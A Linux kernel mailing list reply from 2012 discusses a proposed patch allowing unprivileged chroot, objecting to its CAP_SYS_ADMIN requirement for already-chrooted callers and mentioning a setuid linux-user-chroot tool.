On Sun, 2012-01-15 at 16:37 -0800, Andy Lutomirski wrote: > Because chroot is an easy way to break out of chroot jail, CAP_SYS_ADMIN > is still required if the caller is already chrooted. This part is pretty gross. It means it won't work for stuff like containers (systemd-nspawn etc.) and furthermore I have plans that involve running OS trees inside a chroot, and this would obviously not work for that. Incidentally I ended up putting my setuid program here: http://git.gnome.org/browse/linux-user-chroot/ Now unfortunately, even if we say that a new setuid program is the way to gain these privileges, you still can't nest it, because all of these things are predicated on disabling setuid programs. But it would at least not fail initially if your process was inside a chroot. -- To unsubscribe from this list: send the line "unsubscribe linux-fsdevel" in the body of a message to majordomo@xxxxxxxxxxxxxxx More majordomo info at http://vger.kernel.org/majordomo-info.html
